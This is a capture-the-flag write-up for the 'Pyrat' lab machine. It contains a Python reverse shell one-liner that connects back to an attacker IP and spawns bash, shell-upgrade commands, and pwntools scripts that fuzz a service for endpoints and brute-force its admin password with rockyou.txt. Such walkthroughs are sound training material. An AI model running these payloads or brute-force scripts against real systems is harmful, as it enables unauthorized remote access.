# Pyrat {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Recon We start with an Nmap scan and find two open ports. Port 22 is where we have SSH available and on port 8000 we might have a web server. On closer inspection, this is a simple HTTP server. This reminds of the module SimpleHTTPServer in Python.

When we request the index page, we are only told to use a much simpler connection.

## Shell as www-data We try the simplest thing we can think of - a simple connection using netcat. We get a connection, but no feedback. Maybe we are not actually facing a web server. We assume that we are probably in a Python environment. Maybe something like a Python shell, but there is nothing to suggest this. Simple calls like `1+1` don't work, and we don't seem to be in a shell. However, we get feedback for our `whoami` command that this is not defined. We would have gotten feedback if we used something like `print(1+1)`. ``` nc pyrat.thm 8000 ```

Let's try it blind with a Python reverse shell. First we set up a listener with `nc -lnvp 4445`. For the reverse shell, we use number 2 from `revshells.com` and copy the inner part.

{% code overflow="wrap" %} ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.211.1",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") ``` {% endcode %} Next, we enter the payload and...

... we receive a connection back. We are `www-data`. With the following commands we upgrade our shell. Unfortunately we cannot find the first flag as `www-data`. {% embed url="" %} ``` SHELL=/bin/bash script -q /dev/null ``` ``` CTRL+Z ``` ``` stty raw -echo && fg ```

Interesting, though, we seem not to have access to the current directory. And furthermore, we see that the `/root/.bashrc` is loaded. We are in the root directory, and somehow we became `www-data`. There might be an interesting escape to get directly to `root`. ## Shell as think In the `/opt` directory, we notice the `/dev` folder. This in turn has a `.git` folder. We have a repository here. We check the config and find a password for the username `think`.

The password has been reused, we can now switch to the user or access the machine as `think` via SSH.

## Shell as root We look at the current git status and see that a file has been deleted. The image below shows how this is done in the SSH session, saving you unnecessary steps. In the following, the repository is first downloaded to the attacker's machine and then viewed.

We set up a Python web server.

Download the entire repository.

And start to analyze it. As mentioned before, a file has been deleted. The `pyrat.py.old`. ``` git status ```

With `git restore` we restore the file. ``` git restore pyrat.py.old ```

We see in the script that the `switch_case` function processes incoming data and performs actions based on specific conditions. If the data is 'some\_endpoint', it calls the `get_this_endpoint` function to handle that request. If the data is 'shell', it attempts to spawn an interactive shell on the server, connecting the client's socket to the shell, enabling remote command execution. For any other data input, it runs the `exec_python` function, which executes the Python code sent through the socket. It spawns us a shell.

We go back to our necat connection on port 8000 and try `shell`. And we get a shell. It seems to be the program.

When we try 'some\_endpoint' we get the message that it is not defined. Interesting, this is where we need to fuzz for endpoints with a custom script as mentioned in the room description.

The following shows how to fuzz for the end point. But that could also be guessed, which happened in the first attempt solving the machine. (Looking at the comments) We chose a rather small wordlist for this since we want to work our way up and use pwntools which slows it a bit down, due to the fact that each attempt gets printed.
{% code title="endpoints.py" overflow="wrap" lineNumbers="true" %} ```python from pwn import * # Set the host and port host = "pyrat.thm" port = 8000 directory_file = "endpoints.txt" # Connect to the target def connect_to_service(): return remote(host, port) # Function to attempt login with a endpoint def attempt_endpoint(endpoint): # Connect to the service conn = connect_to_service() # Send the endpoint from the list conn.sendline(endpoint.encode()) response = conn.recvline(timeout=2) # Convert the endpoint to bytes before concatenating if b"name '" + endpoint.encode() + b"' is not defined\n" in response: conn.close() return False else: print(f"Endpoint '{endpoint}' might be correct!") conn.close() return True # Main function to loop through endpoint list def fuzz_endpoints(): with open(directory_file, "r", encoding="latin-1") as f: for endpoint in f: endpoint = endpoint.strip() # Skip lines starting with '#' if endpoint.startswith("#") or not endpoint: continue if attempt_endpoint(endpoint): print(f"Found working endpoint: {endpoint}") break if __name__ == "__main__": fuzz_endpoints() ``` {% endcode %} We have a direct hit with `0`, but this is only a false-positive.

The same applies to special characters or words with special characters.

We remove the numbers, special characters manually and the words with special chars `-` and `_` from the list using awk. ``` awk '!/-|_/' endpoints.txt > filtered_endpoints.txt ``` After that, we run the script again...

... and find the endpoint `admin` after a short duration.

We try the `admin` endpoint and see that a password is now required. If we enter the wrong password, we receive another prompt for the password `Password:` again. This applies three times, then it does not ask for a password again.

We adapt our previous script to fuzz now for passwords using the `rockyou.txt` wordlist. We establish a new connection for the password entry every time because it stops after 3 attempts. This was actually the original script that got adapted to fuzz for the endpoints. {% code title="fuzz.py" overflow="wrap" lineNumbers="true" %} ```python from pwn import * # Set the host and port host = "pyrat.thm" port = 8000 # File path for rockyou.txt password list password_file = "/usr/share/wordlists/rockyou.txt" # Connect to the target def connect_to_service(): return remote(host, port) # Function to attempt login with a password def attempt_password(password): # Connect to the service conn = connect_to_service() # Send 'admin' as the username conn.sendline(b"admin") # Wait for the password prompt conn.recvuntil(b"Password:") # Send the password from the list conn.sendline(password.encode()) # Receive the response and check if we're prompted for a password again response = conn.recvline(timeout=2) response = conn.recvline(timeout=2) # Check if we're asked for the password again (indicates incorrect password) if b"Password:" in response: print(f"Password '{password}' failed.") conn.close() return False elif b"Welcome" in response or b"Success" in response: # Adjust this based on the actual success message print(f"Password '{password}' might be correct!") conn.close() return True else: # Some other response that might indicate progress (adjust based on your observations) print(f"Unexpected response for password '{password}'. Response: {response}") conn.close() return False # Main function to loop through password list def fuzz_passwords(): with open(password_file, "r", encoding="latin-1") as f: for password in f: password = password.strip() if attempt_password(password): print(f"Found working password: {password}") break if __name__ == "__main__": fuzz_passwords() ``` {% endcode %} We run the script and receive a password that seems valid, since the prompt for a password was not repeated.

We try this in our netcat connection, and are greeted with a welcome message to try out the shell. After entering 'shell', we receive a `root` shell and are able to read the flag at `/root/root.txt`.